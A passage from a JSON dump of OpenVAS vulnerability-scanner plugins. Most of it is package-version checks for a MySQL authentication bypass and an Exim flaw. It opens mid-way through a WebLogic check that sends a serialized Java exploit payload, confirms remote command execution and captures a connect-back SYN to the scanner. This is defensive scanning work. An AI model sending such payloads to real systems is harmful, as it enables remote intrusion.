6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2f,0x50,0x61,0x63,0x6b,0x61,0x67,\n0x65,0x49,0x6e,0x66,0x6f,0x3b,0x78,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,\n0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,\n0x61,0x6c,0x2e,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x97,0x22,\n0x45,0x51,0x64,0x52,0x46,0x3e,0x02,0x00,0x03,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,\n0x61,0x67,0x65,0x73,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0e,0x72,0x65,0x6c,0x65,\n0x61,0x73,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x74,0x00,0x12,0x4c,0x6a,0x61,\n0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,\n0x00,0x12,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x41,0x73,0x42,\n0x79,0x74,0x65,0x73,0x74,0x00,0x02,0x5b,0x42,0x78,0x72,0x00,0x24,0x77,0x65,0x62,\n0x6c,0x6f,0x67,0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,\n0x65,0x72,0x6e,0x61,0x6c,0x2e,0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,\n0x6f,0xe6,0xf7,0x23,0xe7,0xb8,0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,\n0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,\n0x61,0x74,0x63,0x68,0x55,0x70,0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,\n0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,\n0x69,0x63,0x65,0x50,0x61,0x63,0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,\n0x61,0x72,0x79,0x50,0x61,0x74,0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,\n0x69,0x74,0x6c,0x65,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,\n0x56,0x65,0x6e,0x64,0x6f,0x72,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0b,0x69,0x6d,\n0x70,0x6c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x05,0x78,0x70,\n0x77,0x02,0x00,0x00,0x78,0xfe,0x00,0xff,0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,\n0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,\n0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,0xde,0x12,0x1e,0x2a,0x0c,\n0x00,0x00,0x78,0x70,0x77,0x46,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0x00,0x0b,0x75,0x73,0x2d,0x6c,\n0x2d,0x62,0x72,0x65,0x65,0x6e,0x73,0xa5,0x3c,0xaf,0xf1,0x00,0x00,0x00,0x07,0x00,\n0x00,0x1b,0x59,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,\n0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x78,0xfe,0x01,0x00,\n0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,\n0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,\n0xde,0x12,0x1e,0x2a,0x0c,0x00,0x00,0x78,0x70,0x77,0x1d,0x01,0x81,0x40,0x12,0x81,\n0x34,0xbf,0x42,0x76,0x00,0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0xa5,\n0x3c,0xaf,0xf1,0x00,0x00,0x00,0x00,0x00,0x78);\n\nplen = raw_string( strlen( payload ) );\n\npayload = raw_string( 0x00,0x00,0x09 ) + plen + payload;\n\nfilter = 'tcp and src ' + get_host_ip() + ' and dst ' + this_host() + ' and dst port ' + lport;\n\nres = send_capture( socket:soc,\n data:payload,\n timeout:8,\n pcap_filter:filter );\n\nclose( soc );\n\nif( res ) {\n flags = get_tcp_element( tcp: res, element: \"th_flags\" );\n if( ( flags & TH_SYN ) ) {\n report = 'It was possible to execute the command `' + cmd + '` on the remote host. The TCP-SYN request to port ' + lport + ' was then successfully captured.';\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-28T00:00:00", "type": "openvas", "title": "Fedora Update for mysql FEDORA-2012-9324", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864504", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864504", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2012-9324\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082877.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864504\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:10 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9324\");\n script_name(\"Fedora Update for mysql FEDORA-2012-9324\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mysql'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"mysql on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.5.24~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-04T11:19:45", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1467-1", "cvss3": {}, "published": "2012-06-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for mysql-5.5 USN-1467-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:841039", "href": "http://plugins.openvas.org/nasl.php?oid=841039", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1467_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for mysql-5.5 USN-1467-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that certain builds of MySQL incorrectly handled password\n authentication on certain platforms. A remote attacker could use this issue\n to authenticate with an arbitrary password and establish a connection.\n (CVE-2012-2122)\n\n MySQL has been updated to 5.5.24 in Ubuntu 12.04 LTS. Ubuntu 10.04 LTS,\n Ubuntu 11.04 and Ubuntu 11.10 have been updated to MySQL 5.1.63. A patch to\n fix the issue was backported to the version of MySQL in Ubuntu 8.04 LTS.\n\n In addition to additional security fixes, the updated packages contain bug\n fixes, new features, and possibly incompatible changes.\n\n Please see the following for more information:\n http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1467-1\";\ntag_affected = \"mysql-5.5 on Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1467-1/\");\n script_id(841039);\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-15 09:46:52 +0530 (Fri, 15 Jun 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_xref(name: \"USN\", value: \"1467-1\");\n script_name(\"Ubuntu Update for mysql-5.5 USN-1467-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.63-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.24-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.63-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.63-0ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.96-0ubuntu3\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:05", "description": "Oracle Linux Local Security Checks ELSA-2010-0970", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0970", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122289", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122289", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0970.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122289\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:04 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0970\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0970 - exim security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0970\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0970.html\");\n script_cve_id(\"CVE-2010-4344\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.63~5.el5_5.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"exim-mon\", rpm:\"exim-mon~4.63~5.el5_5.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"exim-sa\", rpm:\"exim-sa~4.63~5.el5_5.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for mysql FEDORA-2012-9308", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864474", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864474", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2012-9308\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082421.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864474\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 09:40:44 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9308\");\n script_name(\"Fedora Update for mysql FEDORA-2012-9308\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mysql'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mysql on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.5.24~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:03:32", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-93)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120296", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120296", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120296\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:23:04 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-93)\");\n script_tag(name:\"insight\", value:\"sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.\");\n script_tag(name:\"solution\", value:\"Run yum update mysql55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-93.html\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-embedded-devel\", rpm:\"mysql55-embedded-devel~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-debuginfo\", rpm:\"mysql55-debuginfo~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-server\", rpm:\"mysql55-server~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-common\", rpm:\"mysql55-common~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-test\", rpm:\"mysql55-test~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-embedded\", rpm:\"mysql55-embedded~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-bench\", rpm:\"mysql55-bench~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-libs\", rpm:\"mysql55-libs~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55\", rpm:\"mysql55~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql55-devel\", rpm:\"mysql55-devel~5.5.24~1.24.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:45", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1467-1", "cvss3": {}, "published": "2012-06-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for mysql-5.5 USN-1467-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841039", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1467_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for mysql-5.5 USN-1467-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1467-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841039\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-15 09:46:52 +0530 (Fri, 15 Jun 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_xref(name:\"USN\", value:\"1467-1\");\n script_name(\"Ubuntu Update for mysql-5.5 USN-1467-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|12\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1467-1\");\n script_tag(name:\"affected\", value:\"mysql-5.5 on Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that certain builds of MySQL incorrectly handled password\n authentication on certain platforms. A remote attacker could use this issue\n to authenticate with an arbitrary password and establish a connection.\n (CVE-2012-2122)\n\n MySQL has been updated to 5.5.24 in Ubuntu 12.04 LTS. Ubuntu 10.04 LTS,\n Ubuntu 11.04 and Ubuntu 11.10 have been updated to MySQL 5.1.63. A patch to\n fix the issue was backported to the version of MySQL in Ubuntu 8.04 LTS.\n\n In addition to additional security fixes, the updated packages contain bug\n fixes, new features, and possibly incompatible changes.\n\n Please see the references for more information.\");\n\n script_xref(name:\"URL\", 